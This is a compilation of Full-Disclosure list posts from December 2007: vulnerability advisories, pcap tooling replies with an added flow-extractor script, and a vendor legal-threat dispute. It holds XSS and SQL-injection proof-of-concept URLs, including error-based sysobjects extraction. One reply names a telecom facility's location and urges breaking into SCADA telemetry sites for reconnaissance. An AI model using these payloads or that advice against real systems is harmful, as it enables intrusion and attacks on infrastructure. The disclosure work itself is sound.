Re: [Full-disclosure] pcap flow extraction
If you're OK with an intermediate step, you'll find a few tools out there (e.g. switch's YAF) that read pcap and spit out the flow data in NetFlow format. Then a second utility (e.g. flow-tools) can turn that into whatever format you'd like...

John

On Thu, Dec 06, 2007 at 06:35:42PM +1100, Ivan . wrote:

> Hi,
>
> Does anyone have any ideas for flow information extraction from a rather large pcap file, 6 gigs? I am after the standard stuff: source, destination, service. Ethereal/Wireshark is a no go, as it won't process the file due to size; tcpflow is OK, but a little untidy. Any suggestions are appreciated, preferably open source. Also, has anyone used tcpdstat for something like this?
>
> thanks
> Ivan

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pcap flow extraction
yeah, we get this problem in win32 all the time - notepad drops its knickers every time it sees a large file and the OS almost locks up waiting for a response. To solve the problem I pre-process the file with scripts written in VBScript. You can easily write a script to skim off the first few kb of the file so you can work out the file format and then use that to parse out the entire file, only writing out the bits you are interested in to a far smaller file. Alternatively, you can have your script write out all the data in a format that can be BCP'd into a DB that can handle big recordsets and then run SELECT statements as you like to get the data out.

Cheers
SR

On Thu, 06 Dec 2007 07:35:42 + Ivan . [EMAIL PROTECTED] wrote:

> Hi,
>
> Does anyone have any ideas for flow information extraction from a rather large pcap file, 6 gigs?
> <snip>
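Ivan asks for source, destination and service out of a 6 GB pcap, and SR's suggestion is to read just enough of the file to learn its format and then stream through it writing out only the fields of interest. The script below is an added example, not code from anyone in the thread: it reads the libpcap global header to pick byte order and link type, walks the records one at a time so memory use stays flat whatever the file size, stops cleanly on a truncated final record (common in large dumps), and aggregates IPv4 TCP/UDP packets into flows. The port-to-service table, the "lower port is the server" heuristic and the sample capture it builds are constructed assumptions.

```python
import io
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4     # libpcap file magic (microsecond timestamps)
ETHERTYPE_IPV4 = 0x0800
PROTO_NAMES = {6: "tcp", 17: "udp"}
SERVICE_NAMES = {22: "ssh", 53: "dns", 80: "http", 443: "https"}  # assumed port table

def iter_packets(fp):
    """Yield each packet record's bytes, reading the file incrementally, never whole."""
    header = fp.read(24)
    if len(header) < 24:
        raise ValueError("not a pcap file: global header too short")
    magic = struct.unpack("<I", header[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"            # written by a little-endian host
    elif magic == 0xD4C3B2A1:
        endian = ">"            # same magic written by a big-endian host
    else:
        raise ValueError("unknown pcap magic 0x%08x" % magic)
    if struct.unpack(endian + "I", header[20:24])[0] != 1:  # DLT_EN10MB only
        raise ValueError("only Ethernet captures are decoded here")
    while True:
        rec = fp.read(16)
        if len(rec) < 16:       # clean EOF, or a dump cut off inside a record header
            return
        incl_len = struct.unpack(endian + "IIII", rec)[2]
        data = fp.read(incl_len)
        if len(data) < incl_len:  # truncated last record: stop instead of crashing
            return
        yield data

def flow_key(frame):
    """Return (src, dst, proto, sport, dport) for an IPv4 TCP/UDP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl, proto = (ip[0] & 0x0F) * 4, ip[9]
    if ihl < 20 or len(ip) < ihl + 4 or proto not in PROTO_NAMES:
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    sport, dport = struct.unpack("!HH", ip[ihl:ihl + 4])  # ports open both TCP and UDP
    return src, dst, PROTO_NAMES[proto], sport, dport

def service_name(proto, sport, dport):
    """Label a flow by its lower-numbered port, which is usually the server side (assumption)."""
    port = min(sport, dport)
    return SERVICE_NAMES.get(port, "%s/%d" % (proto, port))

def extract_flows(fp):
    """Aggregate packets into unidirectional flows: 5-tuple -> (packets, bytes)."""
    flows = defaultdict(lambda: [0, 0])
    for frame in iter_packets(fp):
        key = flow_key(frame)
        if key is not None:
            flows[key][0] += 1
            flows[key][1] += len(frame)
    return {k: tuple(v) for k, v in flows.items()}

def summarize(pcap_bytes):
    """Return sorted (src, dst, service, packets, bytes) rows for an in-memory pcap."""
    flows = extract_flows(io.BytesIO(pcap_bytes))
    return sorted((src, dst, service_name(proto, sp, dp), pkts, nbytes)
                  for (src, dst, proto, sp, dp), (pkts, nbytes) in flows.items())

def build_frame(src, dst, proto, sport, dport):
    """Constructed sample frame: Ethernet/IPv4 plus a TCP SYN or UDP header, checksums zero."""
    if proto == 6:
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x02, 8192, 0, 0)
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip + l4

def build_pcap(frames, truncate_last=False):
    """Serialize frames as a little-endian pcap; optionally cut the last record short."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        rec = struct.pack("<IIII", 1196900000 + i, 0, len(frame), len(frame)) + frame
        out += rec[:-10] if truncate_last and i == len(frames) - 1 else rec
    return out

SAMPLE_FRAMES = [  # constructed traffic, not a real trace
    build_frame("10.0.0.5", "192.0.2.10", 6, 40001, 80),
    build_frame("10.0.0.5", "192.0.2.10", 6, 40001, 80),
    build_frame("192.0.2.10", "10.0.0.5", 6, 80, 40001),
    build_frame("10.0.0.5", "192.0.2.53", 17, 5353, 53),
]
```

For a real file, pass `open(path, "rb")` to `extract_flows` instead of a `BytesIO`; nothing in the walk depends on the file fitting in memory.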
Re: [Full-disclosure] Nokia N95 cellphone remote DoS using the SIP Stack
> I think you're missing his point. In fact I might be too but my take on it is this: you'd think two PhDs and a PhD student might be able to do something a little more advanced than running a fuzzer and reporting DoS conditions.

Well, in fact as part of our research we are working on smart techniques of how to fuzz. So, whenever we come up with something new, the first thing to do is to test it, whether it works or not. Therefore, the vulnerabilities we had found.

> Do you guys even investigate the DoS to determine the root cause? If ye did then that might be OK and considered PhD level. I would think that a PhD level interpretation of this area might be, for instance, running a fuzzer against a hardware phone and then getting some form of code execution. Yes? No? Maybe?

We do not investigate the cause; as soon as we find a vulnerability we try to see if we can replay it and later send it to the appropriate company to allow them to fix it. As I told you before, the vulnerabilities found are just experimental results of our advances.

> It looks to me like one of you guys built a VoIP fuzzer (is it even a VoIP fuzzer or just SIP?)

In fact, KiF can be split in two (in a very simplistic way):

1) A generic syntax fuzzer able just to generate/parse messages. It takes an ABNF as input and it does the rest, respecting or not the ABNF grammar.

2) A stateful fuzzer able to keep track of the remote state machine and a local testing state machine.

So, the first item can be useful for any non-flat ABNF grammar (e.g. TCP won't work). Usually those grammars can be found in the RFCs. So, differently from most other fuzzers, the extensibility and precision is easily achieved. In terms of the second item, it is totally dependent on SIP at the moment, mostly due to the need of Dialog and Transaction identification. However, we expect to generalize that in the middle-term future.

> and for the remainder of your doctoral studies you will be purchasing equipment and hitting the 'Fuzz' button.
>
> As I said, if you're gonna be submitting this kind of stuff to every list you can then at least investigate the root cause, maybe then it'll provide some slightly more interesting reading and perhaps benefit your thesis.

I already replied to it. Concerning the comments from Reepex, I apologize for all these mails that you received from us, but thanks to this list we had plenty of good feedback on our work. As the purpose of the list is, among others, to disclose vulnerabilities, either we will have these permanent fights or you can simply ignore us. However, thanks for your comments on how to write better Perl code (I can accept comments on how to write better English as well :). Either way, I will take a look at the Perl advice before writing a new script. As Radu said earlier on, we are not experts on Perl and personally not a big fan. The idea was just to show how to replay the problem.

Humberto Abdelnur
PhD student ;)

> nnp
>
> On Dec 5, 2007 11:57 AM, [EMAIL PROTECTED] wrote:
>
>> hi Reepex,
>>
>> I do not understand why you are frustrated about a computer science degree. Maybe someone got dropped out of a degree program and some psychological trauma gets activated when seeing a Ph.D? Whether you like it or not, in order to get a computer science degree, you will have to take classes, and most classes are taught by Ph.Ds. I will not argue with you on why I use the Ph.D in my signature, but if you really want to know, look at our research papers published in academic journals/conferences. (If you do not find them, I can send them to you.) If you ever understand the contents, then you will understand what our credentials are.. :) This will probably never happen. At least, I use a signature and a real name and do not hide behind a gmail account.
>>
>> Meanwhile try yourself to find at least one vulnerability and enjoy Perl programming; it seems your computer science skills are somehow in this area :)
>>
>> Greetings
>> RS
>>
>> Selon reepex [EMAIL PROTECTED]:
>>
>>> So almighty PhD, what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions'. Does this properly summarize your PhD credentials? I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of'. I am sure you will serve the academic community great one day when you teach hacking classes revolving around the latest editions of Hacking Exposed.
>>>
>>> On Dec 5, 2007
[Full-disclosure] [SECURITY] [DSA 1421-1] New wesnoth packages fix arbitrary file disclosure
Debian Security Advisory DSA 1421-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                         Martin Schulze
December 6th, 2007                      http://www.debian.org/security/faq

Package        : wesnoth
Vulnerability  : directory traversal
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2007-5742

A vulnerability has been discovered in Battle for Wesnoth that allows remote attackers to read arbitrary files the user running the client has access to on the machine running the game client.

For the old stable distribution (sarge) this problem has been fixed in version 0.9.0-7.

For the stable distribution (etch) this problem has been fixed in version 1.2-3.

For the stable backports distribution (etch-backports) this problem has been fixed in version 1.2.8-1~bpo40+1.

For the unstable distribution (sid) this problem has been fixed in version 1.2.8-1.

For the experimental distribution this problem has been fixed in version 1.3.12-1.

We recommend that you upgrade your wesnoth package.

Upgrade Instructions

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
[Full-disclosure] [SECUNIA] Vendors still use the legal weapon
In these days, one would have believed that vendors have learned the lesson not to threaten with legal actions to withhold and suppress significant information about vulnerabilities in their products. Well, nonetheless, Secunia just received a sequel of letters from Autonomy, likely not known to many, but it is the software company that supplies the Swiss Army Knife in handling and opening documents in well known software like IBM Lotus Notes and Symantec Mail Security.

*First a little background information*

The communication between Autonomy and their OEM customers regarding which versions of their KeyView software fix given vulnerabilities has failed again and again. This has been a mess to sort out and Secunia has had to spend hours verifying what e.g. was fixed by IBM and what was fixed by Symantec - because apparently the versioning of the KeyView software is different whether used by Symantec, IBM, or others. We've managed to figure this out and occasionally this has caused one of Autonomy's OEM customers to have unpatched publicly known vulnerabilities in their products. All thanks to Autonomy's apparent inability to co-ordinate the release of new vulnerability fixes with their customers.

Now, Autonomy has become fed up with handling all these vulnerabilities and believes that it is time to control what Secunia writes about. Autonomy wants Secunia to withhold information about the fact that vulnerability SA27835 in Keyview Lotus 1-2-3 File Viewer, which has been fixed by IBM, obviously also affects Autonomy's own versions 9.2 and 10.3 of KeyView. According to Autonomy, publishing an advisory would be misleading and cause confusion because the issues already have been fixed; in fact, they believe that this would cause the public to believe that there are more issues in their product than is the case! Now that is an interesting logic.

Sorry Autonomy, writing an advisory that states which vulnerabilities have been fixed and in which versions is in no way misleading or confusing - even for historical issues.

What is really interesting here is the fact that the Vulnerability Database services offered by Autonomy's own customers IBM and Symantec (ISS X-Force and Securityfocus respectively) still (at the time of publishing) don't show information about the fact that patches are available for the Lotus 1-2-3 issue - while Secunia, who Autonomy accuses of publishing misleading information, correctly reflects the fact that Autonomy offers patches. However, this doesn't seem to be a concern for Autonomy, or perhaps their legal department also treats their own customers in the same way as Secunia is treated?

What is misleading and confusing in this whole case is the apparent lack of co-ordination between Autonomy and Autonomy's OEM customers, the lack of clear, precise public statements about vulnerabilities and security fixes. If Autonomy wants to avoid misleading and confusing communication, then Autonomy ought to start publishing bulletins such as those made by most other serious and established software vendors (e.g. Microsoft and their own customers IBM and Symantec) with clear information about the type of vulnerability, potential attack vectors, potential impacts, affected versions, and unaffected versions - it's really that simple. Naturally, Autonomy should also communicate to their own customers (IBM and Symantec) that patches addressing vulnerabilities are available so that both their products and their Vulnerability Database services are updated.

*Our response to these claims and accusations*

Despite Autonomy's unsubstantiated legal threats, Secunia will quite legally continue to do vulnerability research in Autonomy products and any other products of interest. Naturally, Secunia will also continue to publish research articles and advisories in an unbiased, balanced, accurate, and truthful manner as we serve one purpose only: to provide accurate and reliable Vulnerability Intelligence to our customers and the Internet in general.

Secunia is in continuous, ongoing, and positive dialogues with most vendors including large professional organisations like Microsoft, IBM, Adobe, Symantec, Novell, Apple, and CA. All understand and respect the need for informing the public about vulnerabilities and prefer to co-ordinate and synchronise the publication with important Vulnerability Intelligence sources such as Secunia rather than battling to keep things secret.

It is truly sad to see that certain vendors like Autonomy still behave like many software vendors did back in the previous millennium.

Kindest regards,

Thomas Kristensen
CTO, Secunia

Copies of all correspondence in this matter are available below in chronological order, enjoy:

http://secunia.com/gfx/Email%20from%20Secunia%2020071128.pdf
http://secunia.com/gfx/Letter%20from%20Autonomy%2020071202.pdf
http://secunia.com/gfx/Email%20from%20Secunia%2020071203.pdf
http://secunia.com/gfx/Letter%20from%20Autonomy%2020071203.pdf
Re: [Full-disclosure] [SECUNIA] Vendors still use the legal weapon
I would have thought that by this time businesses would be more savvy to the entire vulnerability disclosure process. They don't seem to realize that in most cases it's more damaging to try to quash research than it is to accept it with open arms. That is after all because quashing research is nearly synonymous with lying to customers. This reminds me of the HP vs. SNOsoft fiasco back in 2001.

Thomas Kristensen wrote:

> In these days, one would have believed that vendors have learned the lesson not to threaten with legal actions to withhold and suppress significant information about vulnerabilities in their products.
> <snip>
[Full-disclosure] [ MDKSA-2007:238 ] - Updated liblcms package fixes buffer overflow
Mandriva Linux Security Advisory                         MDKSA-2007:238
http://www.mandriva.com/security/

Package : liblcms
Date    : December 6, 2007
Affected: Corporate 3.0, Corporate 4.0

Problem Description:

Stack-based buffer overflow in Little CMS (lcms) before 1.15 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted ICC profile in a JPG file.

Updated package fixes this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2741

Updated Packages:

Corporate 3.0, Corporate 3.0/X86_64, Corporate 4.0 and Corporate 4.0/X86_64.

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID    Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [USN-554-1] teTeX and TeX Live vulnerabilities
Ubuntu Security Notice USN-554-1
December 06, 2007
tetex-bin, texlive-bin vulnerabilities
CVE-2007-5935, CVE-2007-5936, CVE-2007-5937

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  tetex-bin  3.0-13ubuntu6.1

Ubuntu 6.10:
  tetex-bin  3.0-17ubuntu2.1

Ubuntu 7.04:
  tetex-bin  3.0-27ubuntu1.2

Ubuntu 7.10:
  texlive-extra-utils  2007-12ubuntu3.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Bastien Roucaries discovered that dvips as included in tetex-bin and texlive-bin did not properly perform bounds checking. If a user or automated system were tricked into processing a specially crafted dvi file, dvips could be made to crash and execute code as the user invoking the program. (CVE-2007-5935)

Joachim Schrod discovered that the dviljk utilities created temporary files in an insecure way. Local users could exploit a race condition to create or overwrite files with the privileges of the user invoking the program. (CVE-2007-5936)

Joachim Schrod discovered that the dviljk utilities did not perform bounds checking in many instances. If a user or automated system were tricked into processing a specially crafted dvi file, the dviljk utilities could be made to crash and execute code as the user invoking the program. (CVE-2007-5937)
Re: [Full-disclosure] High Value Target Selection
Really, how much trouble could we get in if we posted up a list of street addresses, each address being a building that contained significant telco and/or routing infrastructure?

Try it, it's amusing. Remember all the photogs getting hassled by the man for merely taking pictures of bridges and plants and such? If you're actually effective at amassing a good database of infrastructure information you'll get the attention you so desperately crave; I promise!

Yes, but stuff such as the cryptome eyeball series http://www.eyeball-series.org exists, though I do not know what kind of problems or requests they have been subjected to. They mention stuff on there such as the (alleged?) Sprint NAP at 4101 Maple Avenue, Merchantville, NJ. Map co-ords 39°56'55.90N, 75° 3'56.72W for you Google Maps and Google Earth people. Or a quick photo link at http://cryptome.org/sprint-map-01.jpg

Love that kind of thing. Who knows how accurate the intel is, however - it ought to be confirmed.

It sure would be neat, but would it be useful, to then cross index it with routing and assorted information? Something sounds enticing about being able to easily pull up a list of locations, get a (literal) picture of them and then within seconds be poking around in their space. Clearly the info exists, such as software like http://www.maxmind.com/app/city. I haven't used it nor do I know how accurate it is. Now if only folks like that got cracked and the data posted on usenet.

And there's all kinds of visual traceroute tools, none of which I have ever been satisfied by. Some kind of free and open yet accurate, updated network image overlay for Google Earth would be nice. The data would be generated from different sources, ideally as many (useful) protocols as possible, customizable, etc. Press a button and various zones become coloured according to some user definable logical and/or physical network characteristics.

Starting to sound too theoretical now ;) At least the PLC, SCADA and related hacking is a nice concrete diversion. Time to sharpen up your lock picking skills and look for the little telemetry shacks in your area, such as by rivers and lakes, railway lines, etc. Pack a notebook with the appropriate tools (nmap, sniffers, etc) and start collecting info; fingerprint it, snmpwalk it, etc. Note makes and models, part numbers, etc. Grab frequency and modulation info for the RF stuff.
[Full-disclosure] ZDI-07-070: Skype skype4com URI Handler Remote Heap Corruption Vulnerability
ZDI-07-070: Skype skype4com URI Handler Remote Heap Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-070.html
December 6, 2007

-- CVE ID:
CVE-2007-5989

-- Affected Vendor:
Skype

-- Affected Products:
Skype 3.6 GOLD

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5752. For further product information on the TippingPoint IPS: http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Skype. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists within the 'skype4com' URI handler created by Skype during installation. When processing short string values through this handler an exploitable memory corruption may occur which can result in arbitrary code execution under the context of the current user.

-- Vendor Response:
Skype has corrected this issue as of 11/15/2007. All clients updated or installed as of that date are patched against this issue.

-- Disclosure Timeline:
2007.11.02 - Vulnerability reported to vendor
2007.12.06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, the Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
[Full-disclosure] [Security Advisory] OpenNewsletter v2.5 Multiple XSS Attacks
[#0001] Intrabytes Security Labs - Vulnerability report.

::: Software: OpenNewsletter
Homepage: http://www.selfexile.com/projects/opennewsletter
Affected version: v2.5 and below

Overview:
OpenNewsletter is a free, simple, and beautiful open source newsletter solution aimed at small-medium scale.

Attack:
Non-existent sanitization when parsing the PHP value 'type' on 'compose.php' leads to some XSS attacks.

PoC:
http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=html'%3Ch1%3EXSS!%3C/h1%3E
http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=';%3CSCRIPT%3Ealert(String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\';%3C/script%3E

Solution:
Not aware of any as of 12/6/2007; the vendor has been warned about the vulnerability.

Discovered by: Manuel Fernandez ([EMAIL PROTECTED])
Intrabytes - I+D Security Area
http://www.intrabytes.com
Re: [Full-disclosure] Anyone have a reason for 2x the email flow today?
> Can you determine the nature of the increase? Is it just spam/junk? I'm seeing a significant increase in my personal mail due to Spam/Junk mail just within the last week.

We have a steady increase in mail since the beginning of October. The difference between then and now is about 23% more spam/junk mails. There are some days with high peaks, but I don't really worry about those days. I would start worrying when the sudden increase stays, and doesn't go down again.

I suppose it has to do with the holidays coming up. A part of the new kind of spam/junk are mailings from locally based companies sending out their holiday gift promotions and such. I remember that last year, we had the same increase in mail, but once it was January, it rapidly decreased again.

Regards,
Sven.
[Full-disclosure] HackerSafe Labs - Security Advisory - Xigla Absolute Banner Manager v4.0
HackerSafe Labs - Security Advisory
http://www.hackersafelabs.com/

Date: 12/06/2007
Vendor: http://www.xigla.com
Package: Xigla Absolute Banner Manager
Versions: v4.0
Credit: Joseph Pierini - HackerSafe Labs

Risk:
Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required
Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major

Overview:
Absolute Banner Manager .NET is a feature-packed Ad Tracking and Banner Management software specially developed for the webmaster looking for a scalable, flexible and reliable Banner Ad Serving front-end tool.

Vulnerabilities:
A SQL injection exists in the Windows version of the Xigla Absolute Banner Manager application.

SQL Injection Page: abm.aspx
SQL Injection Parameter: z=

Examples:
http://www.domainname.com/absolutebm/abm.aspx?z=@@version

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int.

http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(int,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20where%20xtype=char(85)))

Syntax error converting the varchar value 'dtproperties' to a column of data type int.

Resolution Timeline:
Vendor Notification: October 29, 2007: '[EMAIL PROTECTED]'
Vendor Response: None
Vendor Fix: None
Public release of advisory: December 6, 2007

ScanAlert Responsible Disclosure Policy
ScanAlert believes in the responsible disclosure of vulnerability information with a coordinated release with the vendor where possible. Except where active and/or trivial exploitation of the vulnerability is present, ScanAlert believes it is in the best interest of the community when the vendor participates in the process of disclosure and has sufficient time to respond effectively. If ScanAlert exhausts all reasonable means in order to contact a vendor, then ScanAlert may issue a public advisory disclosing its findings 15 business days after the initial contact.

ScanAlert's mission is to make the web safe from hackers. We make web sites secure from hackers and certify it to their customers via our patent pending HACKER SAFE(r) security certification technology. Our daily security audits and real-time certification enables consumers to know whether the sites where they shop are taking the necessary steps to safeguard their personal information from hackers. By alleviating consumers' fears of identity theft and credit card fraud, online merchants who earn HACKER SAFE certification consistently see substantial increases in online transactions.

Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert (www.scanalert.com)
[EMAIL PROTECTED]
877-302-9965 ext 1185
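The error messages in the advisory show the raw z value being converted to an int inside the query, so the request string reaches the SQL engine and the engine's own conversion error is echoed back to the client. The following is an added example of the two-part fix (validate the parameter before it reaches the database and bind it, and never echo engine errors) together with a small check for the leaked error text; it is not Xigla's code, and the table and column names are assumptions.

```python
"""Integer request parameter handling for a lookup like abm.aspx?z=..., as an
added example; not Xigla's code. Table/column names are assumptions."""
import re
import sqlite3
from typing import Optional

# Accept only a plain decimal integer of sane length.
_INT_RE = re.compile(r"^-?\d{1,10}$")

# Shape of the MSSQL errors quoted in the advisory; used for detection only.
_MSSQL_LEAK_RE = re.compile(
    r"Syntax error converting the n?varchar value '.*' to a column of data type int",
    re.IGNORECASE,
)

# URL-decoded form of the advisory's second example input (taken from the advisory).
INJECTED_Z = ("1)) and 1=convert(int,(select top 1 convert(varchar,name) "
              "from sysobjects where xtype=char(85)))")


def legacy_query(z: str) -> str:
    """The weak pattern: the request parameter is concatenated into the SQL text."""
    return f"SELECT banner FROM banners WHERE id = {z}"


def parse_banner_id(z: str) -> int:
    """Reject anything that is not a bare integer before the database sees it."""
    if not _INT_RE.match(z):
        raise ValueError("z must be an integer")
    return int(z)


def lookup_banner(conn: sqlite3.Connection, z: str) -> Optional[str]:
    """Hardened lookup: validated input, bound parameter, no engine error echoed."""
    try:
        banner_id = parse_banner_id(z)
    except ValueError:
        return None  # the caller turns this into a generic 400/404, not a DB error
    row = conn.execute(
        "SELECT banner FROM banners WHERE id = ?", (banner_id,)
    ).fetchone()
    return row[0] if row else None


def leaks_sql_error(response_body: str) -> bool:
    """True if a response echoes an MSSQL int-conversion error like the advisory's.

    Run this over your own site's responses to catch pages that still leak
    engine errors after a fix.
    """
    return _MSSQL_LEAK_RE.search(response_body) is not None


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the banner table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE banners (id INTEGER PRIMARY KEY, banner TEXT)")
    conn.executemany("INSERT INTO banners VALUES (?, ?)",
                     [(1, "summer-sale.gif"), (2, "winter.gif")])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(lookup_banner(db, "1"))           # summer-sale.gif
    print(lookup_banner(db, INJECTED_Z))    # None: rejected before any query runs
    print(lookup_banner(db, "@@version"))   # None
    print(legacy_query(INJECTED_Z))         # the injected text becomes part of the SQL
```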
[Full-disclosure] TCP Port randomization paper
Folks,

We have published a revision of our port randomization paper. This is the first revision of the document since it was accepted as a working group item of the tsvwg working group of the IETF (Internet Engineering Task Force). Any feedback on the proposed/described algorithms will be welcome.

The document is available at:
http://www.ietf.org/internet-drafts/draft-ietf-tsvwg-port-randomization-00.txt

Additionally, it is available in other fancy formats (PDF and HTML) at:
http://www.gont.com.ar/drafts/port-randomization/index.html

Thanks,

--
Fernando Gont
e-mail: [EMAIL PROTECTED] || [EMAIL PROTECTED]
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1
[Full-disclosure] ZDI-07-071: HP OpenView Network Node Manager Multiple CGI Buffer Overflows
ZDI-07-071: HP OpenView Network Node Manager Multiple CGI Buffer Overflows
http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
December 6, 2007

-- CVE ID:
CVE-2007-6204

-- Affected Vendor:
Hewlett-Packard

-- Affected Products:
OpenView Network Node Manager 7.51 and below

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 4790. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard (HP) OpenView Network Node Manager (NNM). Authentication is not required to exploit these vulnerabilities.

The specific flaws exist within the CGI applications that handle the management of the NNM server. Due to lack of bounds checking during a call to sprintf(), sending overly long arguments to the various CGI variables results in a classic stack overflow leading to compromise of the remote server. Exploitation leads to code execution running under the credentials of the web server. Further techniques can be leveraged to gain full SYSTEM access.

The following is a list of vulnerable CGI applications:
- ovlogin.exe
- OpenView5.exe
- snmpviewer.exe
- webappmon.exe

-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More details can be found in HP Security Bulletin Document ID c01188923.

-- Disclosure Timeline:
2006.10.10 - Vulnerability reported to vendor
2007.12.06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Tenable Network Security.
[Full-disclosure] R7-0031: JFreeChart Image Map Cross-Site Scripting Vulnerabilities
___
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose, SC Magazine Winner of Best Vulnerability Management product.
___

Rapid7 Advisory R7-0031
JFreeChart Image Map Cross-Site Scripting Vulnerabilities

Published: Dec 06, 2007
Revision: 1.0
http://www.rapid7.com/advisories/R7-0031.jsp

1. Affected system(s):

KNOWN VULNERABLE:
o JFreeChart 1.0.8

KNOWN FIXED:
o JFreeChart 1.0.8 branch jfreechart-1.0.8-security

2. Summary

JFreeChart is a popular Java-based chart library used to generate charts and graphs of data. The library includes support for generating HTML image maps, which allow for enhanced interaction of the chart via hyperlinks bound to shapes specified by coordinates.

Multiple cross-site scripting vulnerabilities exist within the image map support functionality of JFreeChart which may allow an attacker to inject arbitrary HTML or JavaScript into any product or website which uses the library.

3. Vendor status and information

JFreeChart Project
http://sourceforge.net/projects/jfreechart/

The JFreeChart project was notified of this vulnerability on November 28th, 2007 via their online bug tracking system. The vulnerability was fixed on December 6th 2007 with a commit to their SVN repository.

4. Solution

Upgrade to JFreeChart SVN repository revision 682 using branch jfreechart-1.0.8-security. See http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/ for details.

5. Detailed analysis

JFreeChart fails to properly escape the following properties of the generated image map:
o The chart name.
o The chart tool tip text.
o The href attribute for a chart area.
o The shape attribute for a chart area.
o The coords attribute for a chart area.

It is possible to inject custom HTML code into the code generated by the JFreeChart library. If a web server uses this library to generate charts from user-supplied data, an attacker could cause other users of the same website or application to execute arbitrary JavaScript code when viewing a page containing a chart.

6. Credit

Discovered by Chad Loder of Rapid7.

7. Contact Information

Rapid7, LLC
Email: [EMAIL PROTECTED]
Web: http://www.rapid7.com
Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

